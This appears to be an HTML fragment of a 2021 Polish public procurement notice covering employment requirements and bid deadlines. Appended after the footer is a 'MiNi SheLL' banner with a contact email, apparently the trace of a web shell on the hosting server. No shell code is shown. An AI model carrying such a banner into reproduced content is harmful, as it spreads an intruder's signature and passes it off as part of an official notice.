Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub osobistym za pośrednictwem Systemu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-26 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-24</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-15 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com